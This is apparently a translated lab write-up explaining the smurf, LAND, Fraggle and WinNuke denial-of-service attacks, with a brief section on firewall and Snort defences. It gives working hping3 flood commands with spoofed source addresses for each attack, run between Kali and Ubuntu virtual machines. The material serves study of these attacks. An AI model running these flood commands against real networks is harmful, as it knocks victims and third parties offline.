Malformed message attack (1)
0x01 written in front
I have been watching CTF things outside of my work recently, and then played with werewolves to kill with friends until dark. I almost forgot to record the research on malformed message attacks. This article is about smurf in malformed message attacks Attack, land attack, Fraggle attack, WinNuke attack. Of course, there are other teardrop attacks, IP routing record option control messages, etc., not to write too much here, otherwise the length will be too long.
0X02 Attack Principle Introduction
sumrf attack
The smurf attack is also called ICMP amplification attack. This attack uses the characteristics of broadcast packets to attack. The hacker will imitate the victim host to send ICMP packets with the destination address as the broadcast address in the network. The broadcast address here is 192.168. 4.255, when the gateway receives this data packet, it will be forwarded to all users under the current network, and then all users will send ICMP data packets to the victim
harm
The sumrf attack will cause all hosts on the network to reply to the ICMP packet to the victim, resulting in network congestion. This is several orders of magnitude higher than ordinary ping. The
more complicated Smurf changes the source address to a third-party victim. , Which eventually caused the third party to crash. Amplifier similar to attack.
land attack
The LAND attack method uses a specially constructed TCP SYN packet (usually used to open a new connection) to enable the target machine to open an empty connection with both the source and target addresses being its own IP address, continuously responding to itself, and consuming system resources. Until collapse. This attack method is not the same as the SYN flood attack.
harm
The LAND attack will cause the victim to continuously respond to itself, consuming system resources until it crashes.
Fraggle attack
The attacker can send UDP packets to the network where the attack target is located. The source address of the packet is the address of the attacked host, the destination address is the broadcast address or subnet network address of the subnet where the attacked host is located, and the destination port number is 7 or 19. Each system in the subnet that has this feature enabled will send a response packet to the attacked host, which generates a lot of traffic and fills up the bandwidth, causing the victim network to block or the victim host to crash
harm
Fraggle attacks are similar to sumrf attacks, which occupy bandwidth and cause network congestion.
WinNuke attack
winnuke is carried out using an OOB (OutofBand) vulnerability in the NetBIOS protocol, also known as out-of-band data vulnerability. Its principle is to transmit an Urgent emergency data packet to the computer's 137, 138 or 139 port through the TCP / IP protocol , When win95 / NT receives this data packet, it will instantly freeze or blue screen, you can't continue to use TCP / IP protocol to access the network without restarting the computer
harm
The lower version of the operating system win95 / NT, after receiving this data packet, it will instantly freeze or blue screen, you must restart the computer.
0X03 attack test
Preparation: One kali virtual machine (attacker), one ubuntu virtual machine (victim)
tool: hping3
sumrf attack
Attacker:
Victim: The
attacker sends a sumrf attack packet and sends the packet to the victim's network
hping3 --icmp 192.168.146.255 -a 192.168.146.128 --flood
将目的地址设为广播地址
将发送地址设为受害者地址 -a 数据包发送方地址
Ubuntu packet capture analysis
From the following packet capture, it can be seen that the attacker imitates the victim and wants to broadcast the address to send icmp packets. The victim itself did not send icmp packets. After the
sumrf attack, other devices sent icmp reply packets to the victim. When the packets reached a certain level, it would have the effect of network congestion.
land attack
The kali attack
land attack is to use the characteristics of self-response to send self-response packets to the victim
hping3 192.168.146.128 -p 22 -n -S -a 192.168.146.128 --flood
-p 端口 -n 静默模式 -S 发送SYN
这里只需要将数据包的源地址和目的地址是同一个地址即可
Ubuntu packet capture analysis, through wireshark packet capture view, you can see that you have been sending tcp syn packets to yourself.
Fraggle attack
The kali attack
Fraggle attack uses features not commonly used in udp ports 7, 19, and the other party fakes the victim to send udp messages to the broadcast address.
hping3 192.168.146.255 -a 192.168.146.128 -s 7 -p 19 --flood
-s 目标端口
-p 发送端口
Ubuntu packet capture analysis, through wireshark to see whether it is found to be similar to the sumrf attack, except that one is the udp protocol package, the other is the icmp protocol package, and they are all broadcast addresses.
WinNuke attack
kali attack
Through this attack, you can make full use of Urgent emergency protocol data packets sent to the computing port 137.
hping3 -p 137 -U 192.168.146.128
0X03 How to protect
1. Use a firewall to filter different attacks, and use firewall-related rules to block related data packets.
2. You can also use snort IPS to block these kinds of attacks
LAND attack snort detection rules
Fraggle attack snort detection rules
WinNuke attack snort detection rules
0X04 Summary
This article describes four kinds of malformed message attacks (smurf attack, land attack, fraggle attack, winnuke attack). Each attack has its own characteristics. For these attacks, the process of learning some protocols can help you understand these attacks. Characteristics.
The best time to plant a tree is ten years ago and now, I hope to live up to Shaohua